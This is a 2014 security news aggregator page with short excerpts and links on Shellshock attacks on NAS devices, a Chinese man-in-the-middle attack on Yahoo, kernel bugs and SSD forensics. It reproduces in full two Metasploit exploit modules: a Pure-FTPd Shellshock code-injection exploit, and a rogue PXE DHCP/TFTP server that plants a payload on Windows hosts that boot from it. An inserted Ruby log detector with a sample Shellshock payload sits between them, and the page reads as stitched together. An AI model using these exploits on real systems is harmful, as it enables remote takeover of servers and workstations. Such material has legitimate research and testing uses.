Channel: BOT24

The Shellshock Aftershock for NAS Administrators

FireEye has been monitoring Shellshock-related attacks closely since the vulnerability was first made public last week. Specifically, FireEye has observed attackers attempting to exploit the BASH remote code injection vulnerability against Network Attached Storage systems (NAS). These attacks result in the hackers having a root level remote shell, gaining full access to the contents of the NAS. The observed targets have been primarily located in Japan and Korea with one additional target observed in the US. The only known data on the attackers currently are that two of their malware host servers are located in Korea and the US.

more here..........http://www.fireeye.com/blog/technical/2014/10/the-shellshock-aftershock-for-nas-administrators.html

Verifying Chinese MITM of Yahoo

GreatFire.org sent out a tweet yesterday saying that “Yahoo appears to under Man-in-the-middle attack in China. 3rd case of country-wide MITM, after Google, Github”.
Mashable later ran a story called “China Appears to Attack Yahoo in Latest Censorship of Hong Kong Protests”, where Lorenzo Franceschi-Bicchierai writes:
In what's almost unprecedented, China appears to be targeting Yahoo with what's called a "man-in-the-middle attack." With such an attack, connections to Yahoo.com, which are normally encrypted, would be vulnerable to snooping, and Chinese censors could also block search terms or specific Yahoo links with the goal of preventing Chinese netizens from accessing information about the protests in Hong Kong.
In this blog post we verify that there is an ongoing Man-in-the-Middle (MITM) attack by analyzing two different packet capture files.

more here............http://www.netresec.com/?page=Blog&month=2014-10&post=Verifying-Chinese-MITM-of-Yahoo

xfs directory hash ordering bug

Another kernel bug which did not get a CVE yet, but should be considered
to get one (sorry for the late notification):

https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=c88547a8119e3b581318ab65e9b72f27f23e641d

Basically it allows a local user to corrupt a xfs filesystem by just
creating directories.

more here...........http://permalink.gmane.org/gmane.comp.security.oss.general/14116

Two New Attack Vectors to Aggravate the Android addJavascriptInterface RCE Issue (CVE-2014-7224)

The Android addJavascriptInterface Remote Code Execution (RCE) issue is a disaster in the Android ecosystem (see background knowledge here and here). CVE had assigned CVE-2012-6636 for the basic issue, CVE-2013-4710 for attack vectors introduced in some devices, and CVE-2014-1939 for the default searchBoxJavaBridge_ vector in specific Android versions. For the defense side, developers are recommended not to invoke the addJavascriptInterface API, and meanwhile to call removeJavascriptInterface("searchBoxJavaBridge_") to avoid the by-default impact.

Today we identify two new attack vectors, "accessibility" and "accessibilityTraversal", by default introduced by android/webkit/AccessibilityInjector.java.

more here..........https://daoyuan14.github.io/news/newattackvector.html

Metasploit: Pure-FTPd External Authentication Bash Environment Variable Code Injection

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Pure-FTPd External Authentication Bash Environment Variable Code Injection',
      'Description'     => %q(
        This module exploits the code injection flaw known as shellshock which
        leverages specially crafted environment variables in Bash. This exploit
        specifically targets Pure-FTPd when configured to use an external
        program for authentication.
      ),
      'Author'          =>
        [
          'Stephane Chazelas', # Vulnerability discovery
          'Frank Denis', # Discovery of Pure-FTPd attack vector
          'Spencer McIntyre' # Metasploit module
        ],
      'References'      =>
        [
          ['CVE', '2014-6271'],
          ['OSVDB', '112004'],
          ['EDB', '34765'],
          ['URL', 'https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc']
        ],
      'Payload'         =>
        {
          'DisableNops' => true,
          'Space'       => 2048
        },
      'Targets'         =>
        [
          [ 'Linux x86',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86,
              'CmdStagerFlavor' => :printf
            }
          ],
          [ 'Linux x86_64',
            {
              'Platform'        => 'linux',
              'Arch'            => ARCH_X86_64,
              'CmdStagerFlavor' => :printf
            }
          ]
        ],
      'DefaultOptions' =>
        {
          'PrependFork' => true
        },
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Sep 24 2014'))
    register_options(
      [
        Opt::RPORT(21),
        OptString.new('RPATH', [true, 'Target PATH for binaries used by the CmdStager', '/bin'])
      ], self.class)
    deregister_options('FTPUSER', 'FTPPASS')
  end

  def check
    # this check method tries to use the vulnerability to bypass the login
    username = rand_text_alphanumeric(rand(20) + 1)
    random_id = (rand(100) + 1)
    command = "echo auth_ok:1; echo uid:#{random_id}; echo gid:#{random_id}; echo dir:/tmp; echo end"
    if send_command(username, command) =~ /^2\d\d ok./i
      return CheckCode::Safe if banner !~ /pure-ftpd/i
      disconnect

      command = "echo auth_ok:0; echo end"
      if send_command(username, command) =~ /^5\d\d login authentication failed/i
        return CheckCode::Vulnerable
      end
    end
    disconnect

    CheckCode::Safe
  end

  def execute_command(cmd, _opts)
    cmd.gsub!('chmod', "#{datastore['RPATH']}/chmod")
    username = rand_text_alphanumeric(rand(20) + 1)
    send_command(username, cmd)
  end

  def exploit
    # Cannot use generic/shell_reverse_tcp inside an elf
    # Checking before proceeds
    if generate_payload_exe.blank?
      fail_with(Failure::BadConfig, "#{peer} - Failed to store payload inside executable, please select a native payload")
    end

    execute_cmdstager(linemax: 500)
    handler
  end

  def send_command(username, cmd)
    cmd = "() { :;}; #{datastore['RPATH']}/sh -c \"#{cmd}\""
    connect
    send_user(username)
    password_result = send_pass(cmd)
    disconnect
    password_result
  end
end
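A defender-side counterpart to the module above, added here as an example and not part of the Metasploit module or of Pure-FTPd: it parses FTP command log lines and flags USER/PASS arguments that carry the Bash function-definition-plus-trailing-command shape that CVE-2014-6271 executes when the external authentication program imports them as environment variables. The "<timestamp> <client_ip> <CMD> <argument>" log format and the sample entries are constructed assumptions.

```ruby
# Added example, not part of the Metasploit module above: a log-side detector
# for Shellshock (CVE-2014-6271) payloads delivered through FTP USER/PASS
# arguments. The "<timestamp> <client_ip> <CMD> <argument>" line format and
# the sample entries below are constructed for this example.

# A Bash function definition "() { ... }" followed by ";" and more text is
# the shape a vulnerable Bash executes while importing the variable.
SHELLSHOCK_RE = /\(\s*\)\s*\{[^}]*\}\s*;/

# Parse one constructed log line into a hash; nil if it is not a USER/PASS line.
def parse_ftp_log_line(line)
  m = line.match(/\A(\S+)\s+(\d{1,3}(?:\.\d{1,3}){3})\s+(USER|PASS)\s+(.*)\z/)
  return nil unless m
  { ts: m[1], client: m[2], cmd: m[3], arg: m[4] }
end

# True when the argument carries the function-definition-plus-command shape.
def shellshock_payload?(arg)
  !!(arg =~ SHELLSHOCK_RE)
end

# Return one finding per suspicious line, including the command text that
# follows the function body so an analyst can see what would have run.
def scan_ftp_log(lines)
  findings = []
  lines.each do |line|
    entry = parse_ftp_log_line(line)
    next if entry.nil? || !shellshock_payload?(entry[:arg])
    trailing = entry[:arg].split(/\}\s*;/, 2)[1].to_s.strip
    findings << entry.merge(trailing_command: trailing)
  end
  findings
end

# Constructed sample: one injection attempt (the password field carries the
# payload) plus benign sessions, including brace-heavy real passwords that
# must not trigger the detector.
SAMPLE_FTP_LOG = [
  '2014-10-03T10:01:02Z 198.51.100.7 USER aZ9kQ2',
  '2014-10-03T10:01:02Z 198.51.100.7 PASS () { :;}; /bin/sh -c "echo auth_ok:1; echo end"',
  '2014-10-03T10:02:15Z 203.0.113.4 USER alice',
  '2014-10-03T10:02:15Z 203.0.113.4 PASS s3cret{)}(',
  '2014-10-03T10:03:40Z 203.0.113.9 PASS {x}();',
].freeze

if __FILE__ == $PROGRAM_NAME
  scan_ftp_log(SAMPLE_FTP_LOG).each do |f|
    puts "#{f[:ts]} #{f[:client]} #{f[:cmd]} -> #{f[:trailing_command]}"
  end
end
```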



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit: PXE Exploit Server

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex/proto/tftp'
require 'rex/proto/dhcp'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::TFTPServer
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        => 'PXE Exploit Server',
      'Description'    => %q{
        This module provides a PXE server, running a DHCP and TFTP server.
        The default configuration loads a linux kernel and initrd into memory that
        reads the hard drive; placing the payload on the hard drive of any Windows
        partition seen.

        Note: the displayed IP address of a target is the address this DHCP server
        handed out, not the "normal" IP address the host uses.
      },
      'Author'      => [ 'scriptjunkie' ],
      'License'     => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'Space'       => 4500,
          'DisableNops' => true,
        },
      'Platform'       => 'win',
      'DisclosureDate' => 'Aug 05 2011',
      'Targets'        =>
        [
          [ 'Windows Universal',
            {
            }
          ],
        ],
      'Privileged'     => true,
      'Stance' => Msf::Exploit::Stance::Passive,
      'DefaultTarget'  => 0
    )

    register_options(
      [
        OptInt.new('SESSION',   [ false,  'A session to pivot the attack through' ])
      ], self.class)

    register_advanced_options(
      [
        OptString.new('TFTPROOT',   [ false,  'The TFTP root directory to serve files from' ]),
        OptString.new('SRVHOST',   [ false,  'The IP of the DHCP server' ]),
        OptString.new('NETMASK',   [ false,  'The netmask of the local subnet', '255.255.255.0' ]),
        OptBool.new('RESETPXE',   [ true,  'Resets the server to re-exploit already targeted hosts', false ]),
        OptString.new('DHCPIPSTART',   [ false,  'The first IP to give out' ]),
        OptString.new('DHCPIPEND',   [ false,  'The last IP to give out' ])
      ], self.class)
  end

  def exploit
    if not datastore['TFTPROOT']
      datastore['TFTPROOT'] = File.join(Msf::Config.data_directory, 'exploits', 'pxexploit')
    end
    datastore['FILENAME'] = "update1"
    datastore['SERVEONCE'] = true # once they reboot; don't infect again - you'll kill them!

    # Prepare payload
    print_status("Creating initrd")
    initrd = IO.read(File.join(Msf::Config.data_directory, 'exploits', 'pxexploit','updatecustom'))
    uncompressed = Rex::Text.ungzip(initrd)
    payl = payload.generate
    uncompressed[uncompressed.index('AAAAAAAAAAAAAAAAAAAAAA'),payl.length] = payl
    initrd = Rex::Text.gzip(uncompressed)

    # Meterpreter attack
    if framework.sessions.include? datastore['SESSION']
      client = framework.sessions[datastore['SESSION']]
      if not client.lanattacks
        print_status("Loading lanattacks extension...")
        client.core.use("lanattacks")
      else
        if datastore['RESETPXE']
          print_status("Resetting PXE attack...")
          client.lanattacks.dhcp.reset
        end
      end

      print_status("Loading DHCP options...")
      client.lanattacks.dhcp.load_options(datastore)
      0.upto(4) do |i|
        print_status("Loading file #{i+1} of 5")
        if i < 4
          contents = IO.read(::File.join(datastore['TFTPROOT'],"update#{i}"))
        else
          contents = initrd
        end
        client.lanattacks.tftp.add_file("update#{i}",contents)
      end
      print_status("Starting TFTP server...")
      client.lanattacks.tftp.start
      print_status("Starting DHCP server...")
      client.lanattacks.dhcp.start
      print_status("pxesploit attack started")
      while (true) do
        begin
          # get stats every 20s
          select(nil, nil, nil, 20)
          client.lanattacks.dhcp.log.each do |item|
            print_status("Served PXE attack to #{item[0].unpack('H2H2H2H2H2H2').join(':')} "+
                "(#{Rex::Socket.addr_ntoa(item[1])})")
            report_note({
              :type => 'PXE.client',
              :data => item[0].unpack('H2H2H2H2H2H2').join(':')
            })
          end
        rescue ::Interrupt
          print_status("Stopping TFTP server...")
          client.lanattacks.tftp.stop
          print_status("Stopping DHCP server...")
          client.lanattacks.dhcp.stop
          print_status("PXEsploit attack stopped")
          return
        end
      end
    end

    # normal attack
    print_status("Starting TFTP server...")
    @tftp = Rex::Proto::TFTP::Server.new
    @tftp.set_tftproot(datastore['TFTPROOT'])
    @tftp.register_file('update4',initrd)
    @tftp.start

    print_status("Starting DHCP server...")
    @dhcp = Rex::Proto::DHCP::Server.new( datastore )
    @dhcp.report do |mac, ip|
      print_status("Serving PXE attack to #{mac.unpack('H2H2H2H2H2H2').join(':')} "+
          "(#{Rex::Socket.addr_ntoa(ip)})")
      report_note({
        :type => 'PXE.client',
        :data => mac.unpack('H2H2H2H2H2H2').join(':')
      })
    end
    @dhcp.start
    print_status("pxesploit attack started")

    # Wait for finish..
    @tftp.thread.join
    @dhcp.thread.join
    print_status("pxesploit attack completed")
  end

end




ChopShop 4.0- Protocol Analysis/Decoder Framework

ChopShop is a MITRE-developed framework to aid analysts in the creation and execution of pynids-based decoders and detectors of APT tradecraft.

more here...........https://github.com/MITRECND/chopshop

Recovering Evidence from SSD Drives: Understanding TRIM, Garbage Collection and Exclusions

We published an article on SSD forensics in 2012. SSD self-corrosion, TRIM and garbage collection were little known and poorly understood phenomena at that time, while encrypting and compressing SSD controllers were relatively uncommon. In 2014, many changes happened. We processed numerous cases involving the use of SSD drives and gathered a lot of statistical data. We now know more about many exclusions from SSD self-corrosion that allow forensic specialists to obtain more information from SSD drives.


more here.........http://forensic.belkasoft.com/en/ssd-2014

Windows 10–Active Memory Dump

Windows 10 brings a new type of memory dump: Active Memory Dump. I love this feature, just what I’ve been waiting for.

To analyze the Windows 10 Technical Preview Dump files ensure you have the symbols from http://msdn.microsoft.com/en-us/windows/hardware/gg463028.aspx

This memory dump is much more compact than a complete memory dump, while containing “active memory” in kernel and user mode space.

more here.........http://chentiangemalc.wordpress.com/2014/10/02/windows-10active-memory-dump/

CVE-2013-7331 and Exploit Kits

Thanks to EKWatcher and his decoding skills saving me a lot of time.

As we can see more and more of those "XMLDOM" checks in exploit kits, I decided to write here some of the checks spotted. This is a fast moving area and it will be hard to keep up to date with this, but this may give an idea of how it's being used.

more here........http://malware.dontneedcoffee.com/2014/10/cve-2013-7331-and-exploit-kits.html

Scan the internet for Autonomous Systems that can perform IP spoofing

I have always been interested in IP spoofing. I would say it's something "elegant", and it's a neat way to show how the Internet works, or rather how there are some inherent flaws with it. My greatest geek pride is a hack based on IP spoofing and source IP-port guessing, that allowed me to make players shit carrots while walking.

more here........http://meat.pisto.horse/2014/10/find-autonomous-systems-with-ip-spoofing.html

Seriously! NSSLabs responds to Palo Alto Networks claims about latest NGFW group test results

We don’t follow up every NSS Labs test with a blog response to a vendor, but after the fun and games following our recent BDS test, we find ourselves in a similar position. This time it is Palo Alto Networks blogging about our NGFW group test, the results of which were published last week and can be found here.
While Lee Klarich’s blog was very carefully worded, he never actually addressed the main issue at hand: Palo Alto Networks NGFW misses several critical evasions that leave its customers at risk. The blog did, however, contain some serious inaccuracies that I would like to address.

more here..........https://www.nsslabs.com/blog/seriously

CVE-2014-7284 (NGRO Bug): Lack of randomness in Linux kernel network secrets

In the late 1990s and early 2000s, many operating systems were found to have flawed TCP/IP sequence number generators, and this was identified as a serious security vulnerability (see, for example, Strange Attractors and TCP/IP Sequence Number Analysis - One Year Later). Since that time, generators have been improved, it has been assumed that the problem was dealt with, and most people stopped thinking about these kinds of vulnerabilities.

However, we have identified a problem with the Linux kernel, the result of which was that secret random seed values (e.g., net_secret, syncookie_secret, inet_ehash_secret, etc.) were never initialized on some systems.

more here..........http://secondlookforensics.com/ngro-linux-kernel-bug/

The Unpatchable Malware That Infects USBs Is Now on the Loose

It’s been just two months since researcher Karsten Nohl demonstrated an attack he called BadUSB to a standing-room-only crowd at the Black Hat security conference in Las Vegas, showing that it’s possible to corrupt any USB device with insidious, undetectable malware. Given the severity of that security problem—and the lack of any easy patch—Nohl has held back on releasing the code he used to pull off the attack. But at least two of Nohl’s fellow researchers aren’t waiting any longer.

more here.............http://www.wired.com/2014/10/code-published-for-unfixable-usb-attack/

Cross Site Scripting – Attacking the Honeywell Falcon XLWeb part two

On Tuesday Outpost24 released information on CVE-2014-2717 – Honeywell Authentication Bypass. Later the same day we were contacted by Mr. Bolivar, the second vulnerability researcher mentioned in the initial ICS CERT advisory, who invited us to include information with his full disclosure. It has been confirmed that all attacks presented in this disclosure, including the modified versions of the original advisory, have already been solved by Honeywell.

more here..........http://www.outpost24.com/update-to-advisory-on-honeywell-scada/

Website Security: A Case of SEO Poisoning

There are so many ways your website can be co-opted by hackers for many different reasons; targeting the value created via your SEO is highly attractive. It provides an attacker the opportunity to cheat the system by quickly benefiting from your raw traffic, your audience. In this post we will share details of a recent case in which an attacker leveraged a website's organic traffic to funnel (steal) traffic to their desired pages.

more here...............http://blog.sucuri.net/2014/10/website-security-a-case-of-seo-poisoning.html

NoSQL SSJI Authentication Bypass

Following my previous post on SSJI (Server Side JavaScript Injection), I received many questions requesting more details and techniques on how applications that use a big data back end may be vulnerable, and if I could give some viable examples. I figured we could start with a login page authentication bypass that gives a very clear example of the problem.

more here...........http://blog.imperva.com/2014/10/nosql-ssji-authentication-bypass.html

Reading the Silk Road configuration

Many of us believe it wasn't the FBI who discovered the hidden Silk Road server, but the NSA (or other intelligence organization). We believe the FBI is using "parallel construction", meaning creating a plausible story of how they found the server to satisfy the courts, but a story that isn't true.

Today, Brian Krebs released data from the defense team that seems to confirm the "parallel construction" theory. I thought I'd write up a technical discussion of what was found.

more here............http://blog.erratasec.com/2014/10/reading-silk-road-configuration.html#.VC6AL_ldWSo

Right-winger explains what's wrong with ComputerCop

The EFF has a good article on ComputerCop. Police departments have lashed back, saying the EFF is an "ultra-liberal organization that is not in any way credible on this". While it's true the EFF leans heavily to the left, I'm a right-winger -- and I agree with them in this case. Maybe the police will find my right-wing criticisms of ComputerCop more believable.

more here............http://blog.erratasec.com/2014/10/right-winger-explains-whats-wrong-with.html#.VC6IsvldWSo

The domain 0427d7.se with no readable text is valued at $8.6 Million according to appraisepage.com

Torrent sites link to 0427d7.se and then on to malware. According to appraisepage.com, 0427d7.se was registered 1 year 7 months ago. It has an Alexa rank of #1,018 in the world. It is a domain with a .se extension. Its estimated worth is $8,676,720.00 and it has a daily income of around $8,034.00.

appraisepage.com reference link here...........http://www.appraisepage.com/domain/0427d7.se

here is a virustotal scan of the aforementioned link.......https://www.virustotal.com/ro/url/653b12ceddc84f57527c469b77485550fb615708e2c36b15cd5d9838c9932fb0/analysis/